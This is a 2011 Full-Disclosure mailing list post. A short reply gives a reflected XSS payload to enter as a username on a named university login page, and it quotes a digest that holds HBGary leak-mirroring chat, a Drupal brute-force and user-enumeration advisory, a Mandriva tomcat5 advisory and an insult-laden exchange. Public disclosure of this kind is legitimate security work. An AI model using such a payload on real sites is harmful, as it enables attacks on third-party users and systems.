[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Full-Disclosure Digest, Vol 72, Issue 44
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Full-Disclosure Digest, Vol 72, Issue 44
- From: Friedrich Hausberger <fhausberger@xxxxxxxxx>
- Date: Sat, 19 Feb 2011 14:29:17 +0100
Hello!
Try:
"><script>alert(/XSS/)</script>
as a username in
http://chemistry.cos.ucf.edu/webadmin/login/index.php
only 40 Seconds of reasearch to find it :-)
regards
FHausberger
On 19/02/11 12:04, full-disclosure-request@xxxxxxxxxxxxxxxxx wrote:
> Send Full-Disclosure mailing list submissions to
> full-disclosure@xxxxxxxxxxxxxxxxx
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
> full-disclosure-request@xxxxxxxxxxxxxxxxx
>
> You can reach the person managing the list at
> full-disclosure-owner@xxxxxxxxxxxxxxxxx
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Note to digest recipients - when replying to digest posts, please trim your
> post appropriately. Thank you.
>
>
> Today's Topics:
>
> 1. Re: Fwd: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> 2. Re: Fwd: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> 3. Re: HBGary Mirrors? (Valdis.Kletnieks@xxxxxx)
> 4. Re: (this thread is now about porn).?
> (Cal Leeming [Simplicity Media Ltd])
> 5. Re: HBGary Mirrors? (Valdis.Kletnieks@xxxxxx)
> 6. Re: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> 7. Brute Force and Abuse of Functionality vulnerabilities in
> Drupal (MustLive)
> 8. Re: Fwd: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> 9. Re: HBGary Mirrors? (Valdis.Kletnieks@xxxxxx)
> 10. Re: Brute Force and Abuse of Functionality vulnerabilities in
> Drupal (Justin Klein Keane)
> 11. Re: Fwd: HBGary Mirrors? (Jeffrey Walton)
> 12. [ MDVSA-2011:030 ] tomcat5 (security@xxxxxxxxxxxx)
> 13. Deadline extension | MOBILITY 2011 || July 17-22, 2011 -
> Bournemouth, UK (Alejandro Cánovas Solbes)
> 14. [ MDVSA-2011:031 ] python-django (security@xxxxxxxxxxxx)
> 15. Re: Fwd: HBGary Mirrors? (Dani?l W. Crompton)
> 16. Re: HBGary Mirrors? (William Warren)
> 17. University of Central Florida Multiple LFI (Hack Talk)
> 18. Re: University of Central Florida Multiple LFI (Madhur Ahuja)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Fri, 18 Feb 2011 19:12:19 +0000
> From: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> To: decoder<decoder@xxxxxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTi=A=qzbKu1L36Z+1bdxGhNfcA3T0ZUcNg9VQbvr@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Heh, now that would be interesting. I wonder if the "intent" scenario would
> apply to this also?
>
> On Fri, Feb 18, 2011 at 6:56 PM, decoder<decoder@xxxxxxxxxxxx> wrote:
>
>> I can't answer the question but it would be even more interesting to
>> answer this if you're using a One-Time-Pad (i.e. two files of equal size on
>> two different servers, both XORed give you the data). There exists a
>> mathematical proof that none of the two files leak a single bit of
>> information of the original data :)
>>
>>
>> Chris
>>
>>
>>
>> On 02/18/2011 07:50 PM, Cal Leeming [Simplicity Media Ltd] wrote:
>>
>> Sorry, when I say eligible, I mean "which server would they be allowed to
>> take down by law?".
>>
>> I'm not too hot on the laws of encryption, but I'm sure there is
>> something which states that hosting encrypted files are not illegal, it's
>> distributing the key which allows you to gain access to those fails, which
>> is actually illegal.
>>
>> *DISCLAIMER: I don't know if the above is true or not, so apologies if I
>> got this wrong*
>>
>>
>> On Fri, Feb 18, 2011 at 6:46 PM, ck<c.kernstock@xxxxxxxxxxxxxx> wrote:
>>
>> I go with the server hosting the files since the key should be
>> significant smaller than the files and therefor much easier to mirror.
>>
>> On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd]
>> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx> wrote:
>>> So here's a thought.
>>> If illegally distributed files (such as this one) were encrypted and
>> hosted
>>> on one server, and the key hosted on another, which server would
>>> be eligible for take down?
>>>
>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/23151a9f/attachment-0001.html
>
> ------------------------------
>
> Message: 2
> Date: Fri, 18 Feb 2011 19:11:44 +0000
> From: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> To: Charles Morris<cmorris@xxxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTimy01XQP-eFHOAVCjzbCd5Wg3ZNw6QPZWMXktAP@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> I'm wondering along the same lines as Thor, based on intent. One of those
> "don't take the piss or the judge is gonna own you" scenarios that would be
> tested in court on a per trial basis. Like, if the files were known to
> contain encrypted info, and if it was proved that you knew the contents of
> those files, then you would be held liable.
>
> @Charles: luckily for me, this is all academic as I've kept as far away as
> possible from this hbgary thing :P
>
> On Fri, Feb 18, 2011 at 6:57 PM, Charles Morris<cmorris@xxxxxxxxxx> wrote:
>
>>> Sorry, when I say eligible, I mean "which server would they be allowed to
>>> take down by law?".
>>> I'm not too hot on the laws of encryption, but I'm sure there is
>> something
>>> which states that hosting encrypted files are not illegal, it's
>> distributing
>>> the key which allows you to gain access to those fails, which is actually
>>> illegal.
>>> *DISCLAIMER: I don't know if the above is true or not, so apologies if I
>> got
>>> this wrong*
>>>
>> Attempt A:
>> Cal, I'm not sure on this point off-the-cuff, however encrypted files
>> should* be
>> indistinguishable from random data, so assuming that even if a given LEE
>> has obtained the key and knows that your distributed data is "illegal", you
>> could be held blameless as you have no feasible way to know what the data
>> was.
>>
>> Attempt 2:
>> You could also consider a key and an algorithm a "transform" for a set of
>> random
>> bits, such that once the transform is applied to those bits it would
>> result in something
>> "bad", so you aren't actually distributing "encrypted" "files" at all..
>>
>> just random bits :D
>>
>> *DISCLAIMER: The above will PROBABLY NOT hold in court, so apologies
>> if you get jailed for life
>>
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/1a680f5f/attachment-0001.html
>
> ------------------------------
>
> Message: 3
> Date: Fri, 18 Feb 2011 14:28:02 -0500
> From: Valdis.Kletnieks@xxxxxx
> Subject: Re: [Full-disclosure] HBGary Mirrors?
> To: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<12318.1298057282@localhost>
> Content-Type: text/plain; charset="us-ascii"
>
> On Fri, 18 Feb 2011 18:37:09 GMT, "Cal Leeming [Simplicity Media Ltd]" said:
>> If illegally distributed files (such as this one) were encrypted and hosted
>> on one server, and the key hosted on another, which server would
>> be eligible for take down?
> Questions like that are part of why FreeNet and similar systems were designed.
> Nobody wants to be the test case for a simple question like that one, because
> even if you win the test case, it still sucks. So the obvious thing to do is
> fix things so the simple questions aren't an issue anymore, with the hope that
> the hard questions remain un-askable.
>
> When even the person who stored the file can't tell where the file is, and
> the admin of each participating server has no way of telling what got stored
> on their node, it becomes really hard to draft a proper legal notice (either
> a 17 USC 512 takedown notice, or subpoenas/warrants for more serious stuff).
>
>
>
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 227 bytes
> Desc: not available
> Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/6e2c43af/attachment-0001.bin
>
> ------------------------------
>
> Message: 4
> Date: Fri, 18 Feb 2011 19:28:12 +0000
> From: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] (this thread is now about porn).?
> To: "andrew.wallace"<andrew.wallace@xxxxxxxxxxxxxx>
> Cc: "full-disclosure@xxxxxxxxxxxxxxxxx"
> <full-disclosure@xxxxxxxxxxxxxxxxx>
> Message-ID:
> <AANLkTimrA6nUJUN_caqFPOjVTFfv1mW6W2KufVBWSbGU@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Andrew, I used to fucking work in a NOC as a security consultant you idiotic
> piece of shit. I also used to spend 12 - 18 hours a day in various
> data centres in Harbour Exchange.
>
> Go and check my linkedin.
>
> Oh and, as promised: http://bit.ly/eQIk4O
>
>
>
> On Fri, Feb 18, 2011 at 7:22 PM, andrew.wallace<
> andrew.wallace@xxxxxxxxxxxxxx> wrote:
>
>> On Fri, Feb 18, 2011 at 4:50 PM, Cal Leeming [Simplicity Media Ltd]<
>> cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx> wrote:
>>> "operations centre email system"
>> When you ever get a job in the industry, which is unlikely because of your
>> criminal record you might get to know what an operations centre is.
>>
>> http://en.wikipedia.org/wiki/Network_operations_center
>>
>> Andrew
>>
>>
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/0683cef8/attachment-0001.html
>
> ------------------------------
>
> Message: 5
> Date: Fri, 18 Feb 2011 13:24:31 -0500
> From: Valdis.Kletnieks@xxxxxx
> Subject: Re: [Full-disclosure] HBGary Mirrors?
> To: ck<c.kernstock@xxxxxxxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<8886.1298053471@localhost>
> Content-Type: text/plain; charset="us-ascii"
>
> On Fri, 18 Feb 2011 17:24:23 +0100, ck said:
>> So, the FEDs shut down all mirrors of the HBGary files - or didn't they?
> Between the Streisand Effect and things like Tor and FreeNet, the Feds
> will never be sure if they got all the copies or not.
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 227 bytes
> Desc: not available
> Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/ea1582a1/attachment-0001.bin
>
> ------------------------------
>
> Message: 6
> Date: Fri, 18 Feb 2011 19:30:49 +0000
> From: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] HBGary Mirrors?
> To: Valdis.Kletnieks@xxxxxx
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTi=Th4KjohijmcFWUYYb8Hkq1V_6Qt6vh9-CBwUG@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Oh, I didn't realise that's what FreeNet did, I thought it was a tor
> alternative!
>
> On Fri, Feb 18, 2011 at 7:28 PM,<Valdis.Kletnieks@xxxxxx> wrote:
>
>> On Fri, 18 Feb 2011 18:37:09 GMT, "Cal Leeming [Simplicity Media Ltd]"
>> said:
>>> If illegally distributed files (such as this one) were encrypted and
>> hosted
>>> on one server, and the key hosted on another, which server would
>>> be eligible for take down?
>> Questions like that are part of why FreeNet and similar systems were
>> designed.
>> Nobody wants to be the test case for a simple question like that one,
>> because
>> even if you win the test case, it still sucks. So the obvious thing to do
>> is
>> fix things so the simple questions aren't an issue anymore, with the hope
>> that
>> the hard questions remain un-askable.
>>
>> When even the person who stored the file can't tell where the file is, and
>> the admin of each participating server has no way of telling what got
>> stored
>> on their node, it becomes really hard to draft a proper legal notice
>> (either
>> a 17 USC 512 takedown notice, or subpoenas/warrants for more serious
>> stuff).
>>
>>
>>
>>
>>
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/7f780c84/attachment-0001.html
>
> ------------------------------
>
> Message: 7
> Date: Fri, 18 Feb 2011 21:30:37 +0200
> From: "MustLive"<mustlive@xxxxxxxxxxxxxxxxxx>
> Subject: [Full-disclosure] Brute Force and Abuse of Functionality
> vulnerabilities in Drupal
> To:<submissions@xxxxxxxxxxxxxxxxxxxxxxx>,
> <full-disclosure@xxxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
> Message-ID:<00bb01cbcfa2$85e107c0$c103fea9@ml>
> Content-Type: text/plain; format=flowed; charset="windows-1251";
> reply-type=original
>
> Hello list!
>
> I want to warn you about Brute Force and Abuse of Functionality
> vulnerabilities in Drupal.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are Drupal 6.20 and previous versions.
>
> ----------
> Details:
> ----------
>
> Brute Force (WASC-11):
>
> In login form (http://site/user/) there is no reliable protection against
> brute force attacks. There is no captcha in Drupal itself, and existent
> Captcha module (http://websecurity.com.ua/4749/) is vulnerable (and also all
> plugins to it, such as reCAPTCHA (http://websecurity.com.ua/4752/).
>
> Abuse of Functionality (WASC-42):
>
> At contact page (http://site/contact) and at page for contact with user
> (http://site/user/1/contact) there is a possibility to send spam from the
> site to arbitrary e-mails via function "Send yourself a copy". And with
> using of Insufficient Anti-automation vulnerability it's possible to send
> spam from the site in automated manner on a large scale. The attack with
> using of this function is possible only for logged in users.
>
> For automated sending of spam it's needed to use before-mentioned
> Insufficient Anti-automation vulnerabilities - there is no captcha in Drupal
> itself, and existent captcha-module is vulnerable (and also all plugins to
> it, such as reCAPTCHA).
>
> About such Abuse of Functionality vulnerabilities I wrote in article Sending
> spam via sites and creating spam-botnets
> (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html).
>
> Abuse of Functionality (WASC-42):
>
> At request to specific pages of the site with setting login
> (http://site/users/user) it's possible to find existent logins of the users
> at site (i.e. to enumerate logins). If shows "Access denied" - then such
> login exists, and if "Page not found" - then no.
>
> At request to pages for contact with users (http://site/user/1/contact)
> login of the user shows (i.e. it's possible to enumerate logins). The attack
> is possible to conduct only for logged in users and it'll work only if
> attacked user turned on the option "Personal contact form" in his profile.
>
> ------------
> Timeline:
> ------------
>
> 2010.12.15 - announced at my site.
> 2010.12.16 - informed developers.
> 2011.02.17 - disclosed at my site.
>
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/4763/).
>
> Best wishes& regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
>
>
> ------------------------------
>
> Message: 8
> Date: Fri, 18 Feb 2011 19:43:18 +0000
> From: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> To: Veg<veg@xxxxxxxxxxxxxxx>, full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:
> <AANLkTikHnV+31ff22q2p8JEVxekSiXoUXHWh8m1EgVoF@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset="iso-8859-1"
>
> LMAO, that's fucking brilliant. :D
>
> (had to modify the reply a little, Google was picking it up as spam, and
> forcibly not sending out :S)
>
> On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd]<
> cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx> wrote:
>
>>
>>
>>> On Fri, Feb 18, 2011 at 7:33 PM, Veg<*****> wrote:
>>>
>>>> Pertaining to your question about the key versus the cryptotext:
>>>>
>>>> *http://bit.ly/hSmqvA*
>>>>
>>>>
>>>>
>>>>
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/95095ea0/attachment-0001.html
>
> ------------------------------
>
> Message: 9
> Date: Fri, 18 Feb 2011 14:45:03 -0500
> From: Valdis.Kletnieks@xxxxxx
> Subject: Re: [Full-disclosure] HBGary Mirrors?
> To: "Cal Leeming [Simplicity Media Ltd]"
> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<13207.1298058303@localhost>
> Content-Type: text/plain; charset="us-ascii"
>
> On Fri, 18 Feb 2011 19:30:49 GMT, you said:
>> Oh, I didn't realise that's what FreeNet did, I thought it was a tor
>> alternative!
> http://en.wikipedia.org/wiki/Freenet
>
> https://freenetproject.org/
>
> It's a semi-alternative. Both address the "make it difficult to trace"
> issue in somewhat similar ways. Tor is probably more famous for its
> "provide an anonymous proxy" function, but also supports "hidden" storage.
> The biggest difference is that in the Tor case, the person running the
> storage knows where the files are and what they are - it's just difficult
> for anybody else to find out where it really is. Freenet is more oriented
> towards totally obfuscated storage, where *nobody* knows what a given file
> is, or where it is actually stored, until you actually fetch it (and even
> then, you don't know where the data came from).
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 227 bytes
> Desc: not available
> Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/48a305f4/attachment-0001.bin
>
> ------------------------------
>
> Message: 10
> Date: Fri, 18 Feb 2011 14:45:46 -0500
> From: Justin Klein Keane<justin@xxxxxxxxxxxx>
> Subject: Re: [Full-disclosure] Brute Force and Abuse of Functionality
> vulnerabilities in Drupal
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<4D5ECC6A.7080501@xxxxxxxxxxxx>
> Content-Type: text/plain; charset=ISO-8859-1
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> MustLive: you're a little late to this party, see
> http://www.madirish.net/?article=443, published Dec 2009. The other
> issues you mention may already be disclosed. The Drupal Login Security
> module (http://drupal.org/project/login_security) is an effective
> mitigation for some of these problems. Do you do any research before
> you publish these advisories?
>
> Justin Klein Keane
> http://www.MadIrish.net
>
> The digital signature on this message can be confirmed using
> the public key at http://www.madirish.net/gpgkey
>
> On 02/18/2011 02:30 PM, MustLive wrote:
>> Hello list!
>>
>> I want to warn you about Brute Force and Abuse of Functionality
>> vulnerabilities in Drupal.
>>
>> -------------------------
>> Affected products:
>> -------------------------
>>
>> Vulnerable are Drupal 6.20 and previous versions.
>>
>> ----------
>> Details:
>> ----------
>>
>> Brute Force (WASC-11):
>>
>> In login form (http://site/user/) there is no reliable protection against
>> brute force attacks. There is no captcha in Drupal itself, and existent
>> Captcha module (http://websecurity.com.ua/4749/) is vulnerable (and also all
>> plugins to it, such as reCAPTCHA (http://websecurity.com.ua/4752/).
>>
>> Abuse of Functionality (WASC-42):
>>
>> At contact page (http://site/contact) and at page for contact with user
>> (http://site/user/1/contact) there is a possibility to send spam from the
>> site to arbitrary e-mails via function "Send yourself a copy". And with
>> using of Insufficient Anti-automation vulnerability it's possible to send
>> spam from the site in automated manner on a large scale. The attack with
>> using of this function is possible only for logged in users.
>>
>> For automated sending of spam it's needed to use before-mentioned
>> Insufficient Anti-automation vulnerabilities - there is no captcha in Drupal
>> itself, and existent captcha-module is vulnerable (and also all plugins to
>> it, such as reCAPTCHA).
>>
>> About such Abuse of Functionality vulnerabilities I wrote in article Sending
>> spam via sites and creating spam-botnets
>> (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html).
>>
>> Abuse of Functionality (WASC-42):
>>
>> At request to specific pages of the site with setting login
>> (http://site/users/user) it's possible to find existent logins of the users
>> at site (i.e. to enumerate logins). If shows "Access denied" - then such
>> login exists, and if "Page not found" - then no.
>>
>> At request to pages for contact with users (http://site/user/1/contact)
>> login of the user shows (i.e. it's possible to enumerate logins). The attack
>> is possible to conduct only for logged in users and it'll work only if
>> attacked user turned on the option "Personal contact form" in his profile.
>>
>> ------------
>> Timeline:
>> ------------
>>
>> 2010.12.15 - announced at my site.
>> 2010.12.16 - informed developers.
>> 2011.02.17 - disclosed at my site.
>>
>> I mentioned about these vulnerabilities at my site
>> (http://websecurity.com.ua/4763/).
>>
>> Best wishes& regards,
>> MustLive
>> Administrator of Websecurity web site
>> http://websecurity.com.ua
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.11 (GNU/Linux)
> Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/
>
> iPwEAQECAAYFAk1ezF8ACgkQkSlsbLsN1gA3KAb9GAwPgHQPFrmPSam+i9/BDIm0
> jiR7Yxx0A9ubv3xvQAyz+cVIvcXEXVE040PirkpcnC6lY4ZXWCdvzUiYVrkarlJC
> y6CZ8WVw8xsnjxZb382wHUE00SQF4rylAv4OP0WYDDUqjdEPA+CLxKfaO/LtrmIB
> b3QNPEkJhrxNnW6nHc+JeqAG6Ukz+0zpKen+Wi1IPaOR1XGMaiak7IjSdN91u/XV
> MHlOKyOr1NLEOMze2+rH8PexbrWAXuWyj74F+2lVOeiiD95ZY3CpnIVKJGb6G79h
> EuSuV/+JZ/Idj7pWIO4=
> =pZNB
> -----END PGP SIGNATURE-----
>
>
>
> ------------------------------
>
> Message: 11
> Date: Fri, 18 Feb 2011 14:48:32 -0500
> From: Jeffrey Walton<noloader@xxxxxxxxx>
> Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> To: "Thor (Hammer of God)"<thor@xxxxxxxxxxxxxxx>
> Cc: "full-disclosure@xxxxxxxxxxxxxxxxx"
> <full-disclosure@xxxxxxxxxxxxxxxxx>
> Message-ID:
> <AANLkTinZt1p4ZzrLQJ-8=KitnZW4=ggpABxphEiYVG6L@xxxxxxxxxxxxxx>
> Content-Type: text/plain; charset=windows-1252
>
> On Fri, Feb 18, 2011 at 2:03 PM, Thor (Hammer of God)
> <thor@xxxxxxxxxxxxxxx> wrote:
>> It would ultimately come down to ?intent.?? Technically of course, the
>> encrypted file is not the original file.? Never will be.? Can?t be.? They
>> keys are not either.? ?Used together they can reproduce the copyright
>> data.?? So legally, there would certainly be an interesting argument about
>> what is and what isn?t legal.?? But there would be plenty of cause for an
>> injunction which would put the kibosh on distribution until that legal
>> decision was made.? It doesn?t have to make sense, and it doesn?t have to be
>> strictly ?legal? but it is up to a judge.? Recall that 9th circuit judge
>> Kermit (I believe) ruled against emails on an ISPs server being in scope for
>> wiretap laws since, at the time the ISP was reading them, they were not ?in
>> transit.?? Go figure.
>>
>>
>>
>> If a judge ruled that you were purposely encrypting data and distributing
>> keys to get around copyright laws, he could easily rule against you anyway.
> You gotta love "legislating from the bench." Its too bad US
> politicians do such a poor job that others have to fix their mess.
>
> Jeff
>
>
>
> ------------------------------
>
> Message: 12
> Date: Fri, 18 Feb 2011 22:10:00 +0100
> From: security@xxxxxxxxxxxx
> Subject: [Full-disclosure] [ MDVSA-2011:030 ] tomcat5
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID:<E1PqXaS-0005e2-Kp@xxxxxxxxxxxxxxxxxx>
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> _______________________________________________________________________
>
> Mandriva Linux Security Advisory MDVSA-2011:030
> http://www.mandriva.com/security/
> _______________________________________________________________________
>
> Package : tomcat5
> Date : February 18, 2011
> Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0
> _______________________________________________________________________
>
> Problem Description:
>
> Multiple vulnerabilities has been found and corrected in tomcat5:
>
> When running under a SecurityManager, access to the file system is
> limited but web applications are granted read/write permissions to
> the work directory. This directory is used for a variety of temporary
> files such as the intermediate files generated when compiling JSPs
> to Servlets. The location of the work directory is specified by
> a ServletContect attribute that is meant to be read-only to web
> applications. However, due to a coding error, the read-only setting
> was not applied. Therefore, a malicious web application may modify
> the attribute before Tomcat applies the file permissions. This can be
> used to grant read/write permissions to any area on the file system
> which a malicious web application may then take advantage of. This
> vulnerability is only applicable when hosting web applications from
> untrusted sources such as shared hosting environments (CVE-2010-3718).
>
> The HTML Manager interface displayed web applciation provided data,
> such as display names, without filtering. A malicious web application
> could trigger script execution by an administartive user when viewing
> the manager pages (CVE-2011-0013).
>
> Packages for 2009.0 are provided as of the Extended Maintenance
> Program. Please visit this link to learn more:
> http://store.mandriva.com/product_info.php?cPath=149&products_id=490
>
> The updated packages have been patched to correct these issues.
> _______________________________________________________________________
>
> References:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3718
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0013
> _______________________________________________________________________
>
> Updated Packages:
>
> Mandriva Linux 2009.0:
> 4acc23d840bdd74a8a2a27717c57f813
> 2009.0/i586/tomcat5-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> d901fdb0a4995bf9eb2870b3c9a1d249
> 2009.0/i586/tomcat5-admin-webapps-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> ae34366f41b039c6e53631b185547a7b
> 2009.0/i586/tomcat5-common-lib-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> ade05ceda9f2ae4fb342e7ef5df474e2
> 2009.0/i586/tomcat5-jasper-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 51fab09365486ad60ed686935c1c7511
> 2009.0/i586/tomcat5-jasper-eclipse-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 5f1fc1ea7c38546a38a04000cdf9212a
> 2009.0/i586/tomcat5-jasper-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> bddc26db0a0e9aea3223927566b11442
> 2009.0/i586/tomcat5-jsp-2.0-api-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> effd51cb30b8d2bb5f12a3a0507b1260
> 2009.0/i586/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> e71a36bd07ad8f241104e0e322900d55
> 2009.0/i586/tomcat5-server-lib-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> fc68ce165e49fa63529cda996f9e7e6f
> 2009.0/i586/tomcat5-servlet-2.4-api-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> aa8f7e5205aa734f94661d2e1d87cf03
> 2009.0/i586/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 09488edfcc731340c51322540e050445
> 2009.0/i586/tomcat5-webapps-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 78f469b9bdf9461e9dd423fa51a00fbb
> 2009.0/SRPMS/tomcat5-5.5.27-0.3.0.4mdv2009.0.src.rpm
>
> Mandriva Linux 2009.0/X86_64:
> 7f3a9c9a0f48012967fece5d682cc344
> 2009.0/x86_64/tomcat5-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 3151ab51c99456cf46095557b421a47d
> 2009.0/x86_64/tomcat5-admin-webapps-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 4312fccb593f577b34a77363c140460b
> 2009.0/x86_64/tomcat5-common-lib-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 04580ac069d37ea7ce1223f744dd63bf
> 2009.0/x86_64/tomcat5-jasper-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> adf6a50a74e425cd579d4c76fe518f88
> 2009.0/x86_64/tomcat5-jasper-eclipse-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> be1cdc23f0f7a115835062c6dd22f68e
> 2009.0/x86_64/tomcat5-jasper-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 827ce79fb2c78c7cd5e2b9ed74e60564
> 2009.0/x86_64/tomcat5-jsp-2.0-api-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 5ad827a665ee9a6b20d1e771ada0922a
> 2009.0/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 1133aad0b9a2715bbea40e925f065f0e
> 2009.0/x86_64/tomcat5-server-lib-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 734a3311954704b8d31c134c204273f3
> 2009.0/x86_64/tomcat5-servlet-2.4-api-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> e61e4817d3fe00bca326b7d078d38cc1
> 2009.0/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 4f37e8f46d3435971ad107d3012c2722
> 2009.0/x86_64/tomcat5-webapps-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> 78f469b9bdf9461e9dd423fa51a00fbb
> 2009.0/SRPMS/tomcat5-5.5.27-0.3.0.4mdv2009.0.src.rpm
>
> Mandriva Linux 2010.0:
> 39e1b0164f00a89b96865243916eccb6
> 2010.0/i586/tomcat5-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> b406cccf6e7886b5c47de22ecc82088d
> 2010.0/i586/tomcat5-admin-webapps-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
> b5c3e735cec844c1a7c1206c78a6af51
> 2010.0/i586/tomcat5-common-lib-5.5.27-0.5.0.2mdv2010.0.noarch.rpm
